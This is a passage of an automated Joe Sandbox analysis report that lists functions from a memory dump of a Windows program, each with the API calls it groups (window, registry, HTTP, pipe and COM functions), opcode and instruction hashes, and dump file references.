                                                                          • Instruction ID: 732615a8d65d347b40890b69c765ca00b8b150407b61472e565c25c7d87b9894
                                                                          • Opcode Fuzzy Hash: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                                          • Instruction Fuzzy Hash: 7F118231B2DB8699D721AB10F4407EAA360FB88744FC11036DA4E43768EE7CD146CB10
                                                                          Function 00007FF7ADCB233C Relevance: 12.3, APIs: 8, Instructions: 254windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                          • String ID:
                                                                          • API String ID: 1211466189-0
                                                                          • Opcode ID: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                          • Instruction ID: 34223002dfbfa6ca6288f856f0d3c15c0206d2be5ab2c04d8176384b5407fa45
                                                                          • Opcode Fuzzy Hash: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                          • Instruction Fuzzy Hash: 00A1383271E6838AEB69AF259154779F7A0FB44B44FD25035DA0943AA0FF3CE856C710
                                                                          Function 00007FF7ADC9FCC0 Relevance: 12.2, APIs: 8, Instructions: 246registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                                          • String ID:
                                                                          • API String ID: 50796853-0
                                                                          • Opcode ID: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                          • Instruction ID: 7c5d5e4e5500968f339784a81f32a7a47d7a34666de18ffe75b8fa3bcccac7aa
                                                                          • Opcode Fuzzy Hash: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                          • Instruction Fuzzy Hash: F1B18232B1E65289EB10EF65D4903BDA760EF45B84FC24431EA4E576A6EF3CD106C760
                                                                          Function 00007FF7ADC2443C Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ShowWindow
                                                                          • String ID:
                                                                          • API String ID: 1268545403-0
                                                                          • Opcode ID: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                          • Instruction ID: 6cba6c6cf509168cf0fdeee4deb6059458ace98085bc7ee3216d2097f9bd7fd1
                                                                          • Opcode Fuzzy Hash: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                          • Instruction Fuzzy Hash: 2351C531E0E2828EF765BB28944437DA691DF96F08FDA4031C54E426F5FE3CE886D621
                                                                          Function 00007FF7ADCA90A8 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                          • String ID:
                                                                          • API String ID: 3864802216-0
                                                                          • Opcode ID: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                          • Instruction ID: e039b455c1e67ae18f4eaa81f925b214f4c7a18ccfc50818df17a378d055a039
                                                                          • Opcode Fuzzy Hash: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                          • Instruction Fuzzy Hash: 4241B1766296818BE764CB21B444B6ABBA1F788BD1F914135EF8A03B64EF3CD4418B00
                                                                          Function 00007FF7ADC40BBC Relevance: 10.8, APIs: 7, Instructions: 294COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 3215553584-0
                                                                          • Opcode ID: 0e759f5e66e3bc5bfe8a510da40a1350ef89f4d720a030738aab17a47d454008
                                                                          • Instruction ID: bc5da11c2df0ffed17a3ca5ea071ac2d6cbf248705cd49bd6f7ed1726276e423
                                                                          • Opcode Fuzzy Hash: 0e759f5e66e3bc5bfe8a510da40a1350ef89f4d720a030738aab17a47d454008
                                                                          • Instruction Fuzzy Hash: F9C1F7A2A5E7829DEB64AF11900C27DEB52FF40780FD64135E94E073B5EE7CE4429720
                                                                          Function 00007FF7ADC809C4 Relevance: 10.7, APIs: 7, Instructions: 248COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                          • String ID:
                                                                          • API String ID: 2550207440-0
                                                                          • Opcode ID: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                                          • Instruction ID: 941013a43219f6e7d2fd15f0db8c28d9ec47f0d59a28f0078efb2b1e817c2019
                                                                          • Opcode Fuzzy Hash: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                                          • Instruction Fuzzy Hash: A1A1A022A1E612A9FB50AF65C444BBCA760FB44B86FD64431DE0D476A1FF7CE442D360
                                                                          Function 00007FF7ADC02100 Relevance: 10.7, APIs: 7, Instructions: 246COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                          • String ID:
                                                                          • API String ID: 3225163088-0
                                                                          • Opcode ID: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                          • Instruction ID: 1d1496d59af271d987774d327b67dff35e5f39bbe573d157f7af58cac9766baf
                                                                          • Opcode Fuzzy Hash: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                          • Instruction Fuzzy Hash: 06A1F272A0D6C08BD7349F19A4046AEFB75FB89BD8F914125EA8913B68DB3CD542CF00
                                                                          Function 00007FF7ADCAFB28 Relevance: 10.7, APIs: 7, Instructions: 212windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$Enabled
                                                                          • String ID:
                                                                          • API String ID: 3694350264-0
                                                                          • Opcode ID: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                          • Instruction ID: fff45a7854adfcd14d90c7db0deb8077106b598bb00b606e215701f27e344ef3
                                                                          • Opcode Fuzzy Hash: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                          • Instruction Fuzzy Hash: D4917221E5F64649FBB5AA1594543B9E363EF44B84FD64432EA4D036B1EF3CE8928320
                                                                          Function 00007FF7ADC79034 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                          • Instruction ID: b2c2189873bbf7340b7f1b60fa6a9cd553236daa1f4ad9a96de868883abaeaa3
                                                                          • Opcode Fuzzy Hash: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                          • Instruction Fuzzy Hash: AD51D512A1E2D15EFB61AB31510067DAFB1FB4ABC0FCA8074DA4907B66DE2CD462C731
                                                                          Function 00007FF7ADC8DBF0 Relevance: 10.6, APIs: 7, Instructions: 137networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                                          • String ID:
                                                                          • API String ID: 3401586794-0
                                                                          • Opcode ID: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                          • Instruction ID: b2af66d1f5ad9211aaca89ccaf6c9302f878194860921f9933fefa3e7e5a0da4
                                                                          • Opcode Fuzzy Hash: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                          • Instruction Fuzzy Hash: CB51D32660D7419EE714EF21A800BAEB7A4FB48B88FD54032DE0D03B64EF39D456C720
                                                                          Function 00007FF7ADC74860 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124comlibraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                                          • String ID: DllGetClassObject
                                                                          • API String ID: 668425406-1075368562
                                                                          • Opcode ID: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                          • Instruction ID: 57adcde393bc2e82033f5360878850461dec6b4b50115366d772fbc287be1cdc
                                                                          • Opcode Fuzzy Hash: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                          • Instruction Fuzzy Hash: 30519E22E1EB868AEB14AF12E540379A364FB44B84FD68134DB4D47A61EF7CF056CB10
                                                                          Function 00007FF7ADCAA884 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                          • String ID:
                                                                          • API String ID: 161812096-0
                                                                          • Opcode ID: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                                          • Instruction ID: 9caabf7f20ca789741759e12242ae9e29db14706ee6751d8c9df48afc5147b2a
                                                                          • Opcode Fuzzy Hash: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                                          • Instruction Fuzzy Hash: 57413736A0AB4589EB509F62D8806AC73B1FB48F98F964035DE4D43774EF38E546C710
                                                                          Function 00007FF7ADCA15C4 Relevance: 10.6, APIs: 7, Instructions: 90registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                          • String ID:
                                                                          • API String ID: 395352322-0
                                                                          • Opcode ID: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                          • Instruction ID: b6161e4bd125f455641c9faa01541a189f856c54bdb56207dcd8aef1132f332f
                                                                          • Opcode Fuzzy Hash: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                          • Instruction Fuzzy Hash: 1D41A13261DB858AE721DF11E4543EAA3A1FB89784FC50131EA8D47A78EF3DD14ACB10
                                                                          Function 00007FF7ADC74FCC Relevance: 10.6, APIs: 7, Instructions: 76memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                          • String ID:
                                                                          • API String ID: 3761583154-0
                                                                          • Opcode ID: 470201b7a7510a06dd913372f332e36f0e26382b67c565ba0de27237d0cac92a
                                                                          • Instruction ID: 6c56ad831bac8921a34f1ec3e49ed3e3cf1db1cc694d67560ccd54b06a3ef089
                                                                          • Opcode Fuzzy Hash: 470201b7a7510a06dd913372f332e36f0e26382b67c565ba0de27237d0cac92a
                                                                          • Instruction Fuzzy Hash: 1B319221B1EB458DEB60AF16F444169B3A0FB85FD0FC98236DA5E037A4EE3CE4468714
                                                                          Function 00007FF7ADC74EB0 Relevance: 10.6, APIs: 7, Instructions: 74memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: AllocByteCharMultiStringWide
                                                                          • String ID:
                                                                          • API String ID: 3603722519-0
                                                                          • Opcode ID: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
                                                                          • Instruction ID: 776baba156500bfb3c2f3d6b7fe5ff289d9cae62cc6a3bfa02acc2fb3b40263b
                                                                          • Opcode Fuzzy Hash: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
                                                                          • Instruction Fuzzy Hash: 89312F21B0EB458DEB60AF16E444669F3A0FB45F90FC94236EA5D037A5EF3CE5868710
                                                                          Function 00007FF7ADCAAEDC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                          • String ID: Msctls_Progress32
                                                                          • API String ID: 1025951953-3636473452
                                                                          • Opcode ID: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                          • Instruction ID: d77458f2c7c73c903928c6eb61a71f6f8c10ad04fb2fcfc604e8edeb97599afa
                                                                          • Opcode Fuzzy Hash: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                          • Instruction Fuzzy Hash: 46316F366196818BE3709F25F454B5AB761EB88790F905235EB9903F68DF3CD846CF10
                                                                          Function 00007FF7ADC7FAFC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandlePipe
                                                                          • String ID: nul
                                                                          • API String ID: 1424370930-2873401336
                                                                          • Opcode ID: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                          • Instruction ID: 942202757bc0627a0a1f0b4ba5c6121fec61de5a34016c99b2e8a44c44ae4e81
                                                                          • Opcode Fuzzy Hash: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                          • Instruction Fuzzy Hash: 1A318272A1EA4689EB20AB24D454379B2A0FB85B78FD10334DA7D067E4EF3CD4468B11
